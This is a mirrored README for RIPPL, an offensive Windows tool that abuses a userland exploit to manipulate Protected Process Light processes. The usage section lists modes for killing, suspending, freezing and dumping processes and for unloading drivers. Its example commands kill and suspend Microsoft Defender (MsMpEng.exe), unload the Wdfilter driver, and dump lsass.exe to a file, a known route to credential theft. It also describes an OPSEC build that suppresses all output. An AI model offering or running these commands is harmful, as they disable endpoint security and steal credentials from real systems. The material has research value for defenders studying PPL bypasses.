Giter Club home page Giter Club logo

rippl's Introduction

RIPPL

Manipulating PPL protected processes without using a driver

defender funny

This tool implements a userland exploit to manipulate Windows PPL protected processes. The technique was initially discussed by James Forshaw (a.k.a. @tiraniddo) and Clément Labro (a.k.a. @itm4n) in the following blogposts.

Usage

Warning: the safe version of the binary NEVER outputs anything, as all the strings and print function are stripped away using conditional compilation macros.

Simply run the executable without any argument and you will get a detailed help/usage (only valid for binaries compiled without defining the OPSEC macro)

c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter

rippl's People

Contributors

last-byte avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.